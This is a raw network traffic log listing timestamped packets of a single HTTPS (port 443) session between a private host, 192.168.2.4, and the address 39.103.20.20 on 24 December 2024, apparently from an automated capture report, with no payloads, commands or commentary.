Dec 24, 2024 15:12:32.896608114 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.907354116 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.907414913 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.908632040 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.908698082 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.919970036 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.920048952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.921567917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.921639919 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.935442924 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.935522079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.937175035 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.937230110 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.942220926 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.942291975 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.943912983 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.943979025 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.946824074 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.946882010 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.948529959 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.948584080 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.956264019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.956342936 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.958003998 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.958065033 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.969510078 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.969562054 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.971123934 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.971182108 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.983570099 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.983635902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.985268116 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.985321045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.988606930 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.988656044 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.990391016 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.990458965 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.024085999 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.024153948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.025755882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.025813103 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.030093908 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.030173063 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.031750917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.031796932 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.035197020 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.035250902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.036811113 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.036859989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.050110102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.050158978 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.051846981 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.051901102 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.065469980 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.065529108 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.067409039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.067482948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.079534054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.079582930 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.079838991 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.079885006 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.087397099 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.087445974 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.088939905 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.088992119 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.099545956 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.099600077 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.112912893 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.112957954 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.113203049 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.113254070 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.127046108 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.127099991 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.128285885 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.128338099 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.133703947 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.133770943 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.134898901 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.134951115 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.138670921 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.138721943 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.139113903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.139162064 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.147942066 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.147996902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.148591995 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.148636103 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.165630102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.165668964 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.165698051 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.165971041 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.166018963 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.175355911 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.175417900 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.175820112 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.175863981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.180501938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.180548906 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.180968046 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.181026936 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.216238022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.216298103 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.216672897 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.216727018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.222218037 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.222290039 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.222646952 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.222702026 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.228010893 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.228065014 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.228169918 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.228224993 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.242315054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.242388010 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.243029118 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.243083000 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.252449036 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.256990910 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.257045031 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.258080959 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.258158922 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.277309895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.277364016 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.278512955 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.278565884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.279660940 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.279722929 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.281378031 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.281429052 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.291337967 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.291392088 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.292562008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.292645931 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.304925919 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.305013895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.306313038 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.306368113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.319422007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.319477081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.320667028 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.320724010 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.325974941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.326037884 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.326761007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.326821089 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.330729008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.330780983 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.332591057 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.332644939 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.340257883 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.340316057 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.341739893 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.341789961 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.357943058 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.357999086 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.358251095 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.358302116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.365005016 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.367750883 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.367804050 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.368794918 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.368848085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.373038054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.373105049 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.374639988 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.374700069 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.410475969 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.410533905 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.411526918 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.411575079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.426659107 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.426717997 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.427789927 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.427850008 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.428988934 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.429045916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.430593014 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.430649996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.435252905 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.435302019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.436549902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.436613083 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.472819090 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.472887039 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.473956108 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.474009991 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.482836008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.482893944 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.484452009 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.484505892 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.485605001 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.485657930 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.487052917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.487106085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.488739014 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.488799095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.489970922 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.490021944 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.498383999 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.498436928 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.499700069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.499749899 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.511646986 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.511707067 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.512890100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.512945890 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.520558119 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.520602942 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.520622015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.520668030 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.524312973 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.524368048 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.526020050 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.526073933 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.533585072 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.533631086 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.534714937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.534764051 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.550456047 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.550523996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.551002979 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.551059961 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.561039925 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.561089039 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.562338114 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.562386990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.565984964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.566032887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.567749977 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.567800999 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.596124887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.602523088 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.602583885 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.603848934 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.603892088 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.619079113 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.619129896 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.620131969 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.620184898 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.621819019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.621874094 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.623590946 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.623655081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.627584934 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.627634048 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.628545046 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.628592968 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.664908886 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.664961100 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.666220903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.666266918 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.675359011 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.675415993 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.676362038 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.676414967 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.677969933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.678014994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.679783106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.679830074 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.680696964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.680744886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.682332993 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.682382107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.689922094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.689970016 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.690733910 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.690793991 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.704061031 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.704116106 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.705581903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.705632925 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.710753918 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.710813046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.711879015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.711931944 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.715647936 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.715691090 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.717350960 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.717403889 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.724946022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.725934029 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.725963116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.725971937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.726002932 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.726488113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.742572069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.742711067 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.744313955 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.746552944 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.752262115 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.752580881 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.753638983 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.753818989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.757630110 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.757719994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.758687973 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.758856058 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.795224905 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.795294046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.796686888 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.796749115 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.811501980 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.811599970 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.813281059 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.813343048 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.814321995 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.814388037 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.815903902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.815963030 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.819744110 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.819809914 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:33.821487904 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:33.821551085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.005557060 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.063843012 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.341370106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341553926 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.341567993 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341789961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341818094 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.341825008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341845989 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341850996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.341890097 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341914892 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.341922998 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.341945887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.342359066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.342437983 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342483044 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342509985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.342514992 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342528105 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342540026 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.342564106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342593908 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.342600107 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342611074 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342629910 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.342792988 CET	49740	443	192.168.2.4	39.103.20.20
